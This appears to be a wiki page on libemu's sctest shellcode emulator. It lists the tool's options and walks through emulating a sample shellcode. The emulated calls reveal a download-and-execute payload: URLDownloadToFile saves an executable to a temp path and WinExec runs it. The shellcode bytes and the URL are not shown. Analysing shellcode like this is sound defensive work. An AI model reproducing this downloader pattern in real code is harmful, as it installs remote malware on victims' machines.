From aldeid
sctest is part of the libemu test suite and is very useful when testing new features. Even though the code is historically tainted, it may be a useful starting point for those who want to set up shellcode emulation that allows win32 API calls and offers hooks on these calls. sctest is not the best example, since the code is cluttered by the logic for graphing the call flow, but for now it has to work.


-a PATH, --argos-csi=PATH
    use this argos csi files as input
-b IP:PORT, --bind=IP:PORT
    bind this ip:port
-c IP:PORT, --connect=IP:PORT
    redirect connects to this ip:port
-C CMD, --cmd=CMD
    command to execute for "cmd" in shellcode (default: cmd="/bin/sh -c \"cd ~/.wine/drive_c/; wine 'c:\windows\system32\cmd_orig.exe' \"")
-d, --dump
    dump the shellcode (binary) to stdout
-g, --getpc
    run getpc mode, try to detect a shellcode
-G PATH, --graph=PATH
    save a dot formatted callgraph in filepath
-h, --help
    show this help
-i, --interactive
    proxy api calls to the host operating system
-l, --listtests
    list all tests
-o [INT|HEX], --offset=[INT|HEX]
    manual offset for shellcode, accepts int and hex values
-p PATH, --profile=PATH
    write shellcode profile to this file
-S, --stdin
    read shellcode/buffer from stdin, works with -g
-s INTEGER, --steps=INTEGER
    max number of steps to run
-t INTEGER, --testnumber=INTEGER
    the test to run
-v, --verbose
    be verbose, can be used multiple times, e.g. -vv


Let's use libemu sctest to analyze the following shellcode (lines have been wrapped):

$ more shellcode.hex 

We will use the following alias to convert this hex-encoded shellcode to raw binary (it strips the "\x" prefixes and lets xxd decode the remaining hex digits):

$ grep hex2raw ~/.bash_aliases 
alias hex2raw="tr -d '\\\x' | xxd -r -p"
$ cat shellcode.hex | hex2raw > shellcode.raw 

Now, let's run sctest, reading the raw shellcode from stdin (-S), in verbose mode (-v), with a limit of 10000000 emulation steps (-s):

$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt 

Here is the output, with an explanation after each emulated API call (the original page shows it as a two-column table, code excerpt on the left and explanation on the right):

$ more sctest-out.txt 
verbose = 1
Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
stepcount 295460

HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fc6 => 
           = "urlmon";
) = 0x7df20000;

Explanation: Call LoadLibraryA to load urlmon.dll, required later to invoke URLDownloadToFile.

DWORD GetTempPathA (
     DWORD nBufferLength = 260;
     LPTSTR lpBuffer = 0x00416ec2 => 
           = "c:\tmp\";
) =  7;

Explanation: Call GetTempPathA to determine the path where the downloaded file will be saved.

HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
     LPCTSTR szURL = 0x00417140 => 
           = "
     LPCTSTR szFileName = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     DWORD dwReserved = 0;
) =  0;

Explanation: Call URLDownloadToFile to download a file from the remote URL and save it under the temporary path.

UINT WinExec (
     LPCSTR lpCmdLine = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     UINT uCmdShow = 1;
) =  32;

Explanation: Call WinExec to execute the downloaded file.

void ExitProcess (
     UINT uExitCode = 1952201315;
) =  0;

Explanation: Call ExitProcess to exit the process that has downloaded the file.
